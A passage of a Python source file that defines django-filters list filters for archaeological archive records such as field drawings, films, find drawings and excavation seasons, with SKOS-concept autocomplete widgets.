label=Document4DPuzzleID._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Document4DPuzzleID._meta.get_field('fc_directory').help_text,
label=Document4DPuzzleID._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Document4DPuzzleID._meta.get_field('fc_type').help_text,
label=Document4DPuzzleID._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Document4DPuzzleID._meta.get_field('fc_filename').help_text,
label=Document4DPuzzleID._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Document4DPuzzleID._meta.get_field('fc_extension').help_text,
label=Document4DPuzzleID._meta.get_field('fc_extension').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Document4DPuzzleID._meta.get_field('document_id').help_text,
label=Document4DPuzzleID._meta.get_field('document_id').verbose_name
)
original_4dpuzzle_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Document4DPuzzleID._meta.get_field('original_4dpuzzle_id').help_text,
label=Document4DPuzzleID._meta.get_field('original_4dpuzzle_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Document4DPuzzleID._meta.get_field('document_title').help_text,
label=Document4DPuzzleID._meta.get_field('document_title').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Document4DPuzzleID._meta.get_field('digitisation_comment').help_text,
label=Document4DPuzzleID._meta.get_field('digitisation_comment').verbose_name
)
corresponding_to = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Document4DPuzzleID._meta.get_field('corresponding_to').help_text,
label=Document4DPuzzleID._meta.get_field('corresponding_to').verbose_name
)
class Meta:
model = Document4DPuzzleID
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'document_type',
'document_id',
'original_4dpuzzle_id',
'document_title',
'digitisation_comment',
'corresponding_to',
]
class DocumentTypesListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=DocumentTypes._meta.get_field('legacy_id').help_text,
label=DocumentTypes._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=DocumentTypes._meta.get_field('fc_name').help_text,
label=DocumentTypes._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=DocumentTypes._meta.get_field('fc_directory').help_text,
label=DocumentTypes._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=DocumentTypes._meta.get_field('fc_type').help_text,
label=DocumentTypes._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=DocumentTypes._meta.get_field('fc_filename').help_text,
label=DocumentTypes._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=DocumentTypes._meta.get_field('fc_extension').help_text,
label=DocumentTypes._meta.get_field('fc_extension').verbose_name
)
document_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=DocumentTypes._meta.get_field('document_type').help_text,
label=DocumentTypes._meta.get_field('document_type').verbose_name
)
document_maintype = django_filters.CharFilter(
lookup_expr='icontains',
help_text=DocumentTypes._meta.get_field('document_maintype').help_text,
label=DocumentTypes._meta.get_field('document_maintype').verbose_name
)
dt_abbr = django_filters.CharFilter(
lookup_expr='icontains',
help_text=DocumentTypes._meta.get_field('dt_abbr').help_text,
label=DocumentTypes._meta.get_field('dt_abbr').verbose_name
)
document_subtype = django_filters.CharFilter(
lookup_expr='icontains',
help_text=DocumentTypes._meta.get_field('document_subtype').help_text,
label=DocumentTypes._meta.get_field('document_subtype').verbose_name
)
ds_abbr = django_filters.CharFilter(
lookup_expr='icontains',
help_text=DocumentTypes._meta.get_field('ds_abbr').help_text,
label=DocumentTypes._meta.get_field('ds_abbr').verbose_name
)
description = django_filters.CharFilter(
lookup_expr='icontains',
help_text=DocumentTypes._meta.get_field('description').help_text,
label=DocumentTypes._meta.get_field('description').verbose_name
)
analogue_borndigital = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="analogue_borndigital"
),
help_text=DocumentTypes._meta.get_field('analogue_borndigital').help_text,
label=DocumentTypes._meta.get_field('analogue_borndigital').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/analogue_borndigital",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = DocumentTypes
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'document_type',
'document_maintype',
'dt_abbr',
'document_subtype',
'ds_abbr',
'description',
'analogue_borndigital',
]
class ExcavationObjectIDListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationObjectID._meta.get_field('legacy_id').help_text,
label=ExcavationObjectID._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationObjectID._meta.get_field('fc_name').help_text,
label=ExcavationObjectID._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationObjectID._meta.get_field('fc_directory').help_text,
label=ExcavationObjectID._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationObjectID._meta.get_field('fc_type').help_text,
label=ExcavationObjectID._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationObjectID._meta.get_field('fc_filename').help_text,
label=ExcavationObjectID._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationObjectID._meta.get_field('fc_extension').help_text,
label=ExcavationObjectID._meta.get_field('fc_extension').verbose_name
)
excavation_object_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationObjectID._meta.get_field('excavation_object_id').help_text,
label=ExcavationObjectID._meta.get_field('excavation_object_id').verbose_name
)
profile_orientation = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationObjectID._meta.get_field('profile_orientation').help_text,
label=ExcavationObjectID._meta.get_field('profile_orientation').verbose_name
)
year = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationObjectID._meta.get_field('year').help_text,
label=ExcavationObjectID._meta.get_field('year').verbose_name
)
season = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationObjectID._meta.get_field('season').help_text,
label=ExcavationObjectID._meta.get_field('season').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationObjectID._meta.get_field('digitisation_comment').help_text,
label=ExcavationObjectID._meta.get_field('digitisation_comment').verbose_name
)
excavation_object_type = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_object_type"
),
help_text=ExcavationObjectID._meta.get_field('excavation_object_type').help_text,
label=ExcavationObjectID._meta.get_field('excavation_object_type').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_object_type",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=ExcavationObjectID._meta.get_field('site_id').help_text,
label=ExcavationObjectID._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
area = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="area"
),
help_text=ExcavationObjectID._meta.get_field('area').help_text,
label=ExcavationObjectID._meta.get_field('area').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/area",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
square_trench = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="square_trench"
),
help_text=ExcavationObjectID._meta.get_field('square_trench').help_text,
label=ExcavationObjectID._meta.get_field('square_trench').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/square_trench",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
planum = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="planum"
),
help_text=ExcavationObjectID._meta.get_field('planum').help_text,
label=ExcavationObjectID._meta.get_field('planum').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/planum",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = ExcavationObjectID
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'excavation_object_id',
'profile_orientation',
'excavation_id',
'year',
'season',
'part_of_excavation_object_id',
'digitisation_comment',
'excavation_object_type',
'site_id',
'area',
'square_trench',
'planum',
]
class ExcavationSeasonsListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationSeasons._meta.get_field('legacy_id').help_text,
label=ExcavationSeasons._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationSeasons._meta.get_field('fc_name').help_text,
label=ExcavationSeasons._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationSeasons._meta.get_field('fc_directory').help_text,
label=ExcavationSeasons._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationSeasons._meta.get_field('fc_type').help_text,
label=ExcavationSeasons._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationSeasons._meta.get_field('fc_filename').help_text,
label=ExcavationSeasons._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationSeasons._meta.get_field('fc_extension').help_text,
label=ExcavationSeasons._meta.get_field('fc_extension').verbose_name
)
excavation_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationSeasons._meta.get_field('excavation_id').help_text,
label=ExcavationSeasons._meta.get_field('excavation_id').verbose_name
)
grabungskampagnen = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationSeasons._meta.get_field('grabungskampagnen').help_text,
label=ExcavationSeasons._meta.get_field('grabungskampagnen').verbose_name
)
year = django_filters.CharFilter(
lookup_expr='icontains',
help_text=ExcavationSeasons._meta.get_field('year').help_text,
label=ExcavationSeasons._meta.get_field('year').verbose_name
)
season = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="season"
),
help_text=ExcavationSeasons._meta.get_field('season').help_text,
label=ExcavationSeasons._meta.get_field('season').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/season",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=ExcavationSeasons._meta.get_field('access').help_text,
label=ExcavationSeasons._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = ExcavationSeasons
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'excavation_id',
'grabungskampagnen',
'year',
'season',
'access',
]
class FielddrawingListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('legacy_id').help_text,
label=Fielddrawing._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('fc_name').help_text,
label=Fielddrawing._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('fc_directory').help_text,
label=Fielddrawing._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('fc_type').help_text,
label=Fielddrawing._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('fc_filename').help_text,
label=Fielddrawing._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('fc_extension').help_text,
label=Fielddrawing._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('filename').help_text,
label=Fielddrawing._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('document_id').help_text,
label=Fielddrawing._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('document_title').help_text,
label=Fielddrawing._meta.get_field('document_title').verbose_name
)
storage_folder_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('storage_folder_original').help_text,
label=Fielddrawing._meta.get_field('storage_folder_original').verbose_name
)
original_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="original_material"
),
help_text=Fielddrawing._meta.get_field('original_material').help_text,
label=Fielddrawing._meta.get_field('original_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/original_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
original_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('original_inventory_number').help_text,
label=Fielddrawing._meta.get_field('original_inventory_number').verbose_name
)
find_inventory_number = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('find_inventory_number').help_text,
label=Fielddrawing._meta.get_field('find_inventory_number').verbose_name
)
amendment_date = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('amendment_date').help_text,
label=Fielddrawing._meta.get_field('amendment_date').verbose_name
)
stratum_id_relative = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('stratum_id_relative').help_text,
label=Fielddrawing._meta.get_field('stratum_id_relative').verbose_name
)
stratum_id_absolute_prepub = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('stratum_id_absolute_prepub').help_text,
label=Fielddrawing._meta.get_field('stratum_id_absolute_prepub').verbose_name
)
stratum_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('stratum_comment').help_text,
label=Fielddrawing._meta.get_field('stratum_comment').verbose_name
)
month = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('month').help_text,
label=Fielddrawing._meta.get_field('month').verbose_name
)
scale = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('scale').help_text,
label=Fielddrawing._meta.get_field('scale').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('original_comment').help_text,
label=Fielddrawing._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('digitisation_comment').help_text,
label=Fielddrawing._meta.get_field('digitisation_comment').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('creation_year_original').help_text,
label=Fielddrawing._meta.get_field('creation_year_original').verbose_name
)
season = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Fielddrawing._meta.get_field('season').help_text,
label=Fielddrawing._meta.get_field('season').verbose_name
)
file_extension = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension"
),
help_text=Fielddrawing._meta.get_field('file_extension').help_text,
label=Fielddrawing._meta.get_field('file_extension').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Fielddrawing._meta.get_field('copyright').help_text,
label=Fielddrawing._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Fielddrawing._meta.get_field('access').help_text,
label=Fielddrawing._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Fielddrawing._meta.get_field('site_id').help_text,
label=Fielddrawing._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
equipment_scan = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="equipment_scan"
),
help_text=Fielddrawing._meta.get_field('equipment_scan').help_text,
label=Fielddrawing._meta.get_field('equipment_scan').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/equipment_scan",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
source_original_copy_edited_copy = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="source_original_copy_edited_copy"
),
help_text=Fielddrawing._meta.get_field('source_original_copy_edited_copy').help_text,
label=Fielddrawing._meta.get_field('source_original_copy_edited_copy').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/source_original_copy_edited_copy",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
creator_scan = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="creator_scan"
),
help_text=Fielddrawing._meta.get_field('creator_scan').help_text,
label=Fielddrawing._meta.get_field('creator_scan').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/creator_scan",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=Fielddrawing._meta.get_field('excavation_post_excavation').help_text,
label=Fielddrawing._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Fielddrawing
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'filename',
'document_id',
'document_title',
'document_type',
'creation_date_original',
'creation_date_scan',
'creation_date_metadata',
'creator_metadata',
'creator_original',
'storage_folder_original',
'resolution_scan_ppi',
'original_material',
'original_inventory_number',
'find_inventory_number',
'amendment_drawn_by',
'amendment_date',
'drawer_monogram',
'excavation_object_id',
'archaeological_object_id',
'stratum_id_relative',
'stratum_id_absolute_prepub',
'stratum_comment',
'month',
'scale',
'original_comment',
'digitisation_comment',
'excavation_id',
'creation_year_original',
'season',
'file_extension',
'copyright',
'access',
'site_id',
'equipment_scan',
'source_original_copy_edited_copy',
'creator_scan',
'excavation_post_excavation',
]
class FilmListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('legacy_id').help_text,
label=Film._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('fc_name').help_text,
label=Film._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('fc_directory').help_text,
label=Film._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('fc_type').help_text,
label=Film._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('fc_filename').help_text,
label=Film._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('fc_extension').help_text,
label=Film._meta.get_field('fc_extension').verbose_name
)
film_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('film_id').help_text,
label=Film._meta.get_field('film_id').verbose_name
)
addition_film_identifier = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('addition_film_identifier').help_text,
label=Film._meta.get_field('addition_film_identifier').verbose_name
)
foto_numbers_missing = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('foto_numbers_missing').help_text,
label=Film._meta.get_field('foto_numbers_missing').verbose_name
)
decomposition_phenomenon = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('decomposition_phenomenon').help_text,
label=Film._meta.get_field('decomposition_phenomenon').verbose_name
)
acetic_acid_smell = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('acetic_acid_smell').help_text,
label=Film._meta.get_field('acetic_acid_smell').verbose_name
)
storage_folder_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('storage_folder_original').help_text,
label=Film._meta.get_field('storage_folder_original').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('original_comment').help_text,
label=Film._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('digitisation_comment').help_text,
label=Film._meta.get_field('digitisation_comment').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Film._meta.get_field('creation_year_original').help_text,
label=Film._meta.get_field('creation_year_original').verbose_name
)
film_format = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="film_format"
),
help_text=Film._meta.get_field('film_format').help_text,
label=Film._meta.get_field('film_format').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/film_format",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
film_brand = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="film_brand"
),
help_text=Film._meta.get_field('film_brand').help_text,
label=Film._meta.get_field('film_brand').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/film_brand",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
equipment_camera_brand = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="equipment_camera_brand"
),
help_text=Film._meta.get_field('equipment_camera_brand').help_text,
label=Film._meta.get_field('equipment_camera_brand').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/equipment_camera_brand",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
original_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="original_material"
),
help_text=Film._meta.get_field('original_material').help_text,
label=Film._meta.get_field('original_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/original_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Film
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'film_id',
'film_number',
'addition_film_identifier',
'foto_numbers_missing',
'decomposition_phenomenon',
'acetic_acid_smell',
'storage_folder_original',
'original_comment',
'digitisation_comment',
'document_type',
'excavation_id',
'creation_year_original',
'film_format',
'film_brand',
'equipment_camera_brand',
'original_material',
]
class FinddrawingListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('legacy_id').help_text,
label=Finddrawing._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('fc_name').help_text,
label=Finddrawing._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('fc_directory').help_text,
label=Finddrawing._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('fc_type').help_text,
label=Finddrawing._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('fc_filename').help_text,
label=Finddrawing._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('fc_extension').help_text,
label=Finddrawing._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('filename').help_text,
label=Finddrawing._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('document_id').help_text,
label=Finddrawing._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('document_title').help_text,
label=Finddrawing._meta.get_field('document_title').verbose_name
)
filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('filename_old').help_text,
label=Finddrawing._meta.get_field('filename_old').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('creation_year_original').help_text,
label=Finddrawing._meta.get_field('creation_year_original').verbose_name
)
storage_folder_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('storage_folder_original').help_text,
label=Finddrawing._meta.get_field('storage_folder_original').verbose_name
)
equipment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('equipment').help_text,
label=Finddrawing._meta.get_field('equipment').verbose_name
)
rendered_in_ink = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('rendered_in_ink').help_text,
label=Finddrawing._meta.get_field('rendered_in_ink').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('original_comment').help_text,
label=Finddrawing._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Finddrawing._meta.get_field('digitisation_comment').help_text,
label=Finddrawing._meta.get_field('digitisation_comment').verbose_name
)
file_extension = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension"
),
help_text=Finddrawing._meta.get_field('file_extension').help_text,
label=Finddrawing._meta.get_field('file_extension').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Finddrawing._meta.get_field('copyright').help_text,
label=Finddrawing._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Finddrawing._meta.get_field('access').help_text,
label=Finddrawing._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
